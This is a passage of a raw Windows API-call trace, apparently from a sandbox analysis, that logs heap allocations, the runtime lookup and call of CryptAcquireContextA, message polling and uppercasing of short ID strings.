hHeap=0x25c0000) returned 1 [0251.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0251.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0251.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0251.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0251.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.398] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0251.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0251.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0251.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3a08 [0251.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0251.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0251.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0251.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x15) returned 0x2466d90 [0251.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0251.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0251.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.399] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0251.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0251.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a08 | out: hHeap=0x25c0000) returned 1 [0251.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0251.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0251.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0251.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0251.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0251.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0251.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.400] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad31c0) returned 1 [0251.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0251.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0251.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0251.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0251.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0251.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0251.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0251.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0251.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0251.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0251.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0251.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0251.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0251.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0251.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0251.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0251.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0251.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0251.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0251.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0251.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0251.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0251.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0251.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0251.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0251.405] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0251.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0251.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0251.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0251.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0251.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0251.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0251.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0251.406] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0251.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0251.406] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0251.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0251.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1798 [0251.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0251.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0251.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0251.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0251.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0251.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0251.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0251.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0251.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0251.408] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0251.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0251.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0251.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0251.408] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0251.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0251.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0251.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0251.409] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0251.409] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0251.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0251.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0251.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.409] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0251.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0251.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0251.412] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.412] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.412] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0251.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0251.412] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0251.412] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0251.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.413] 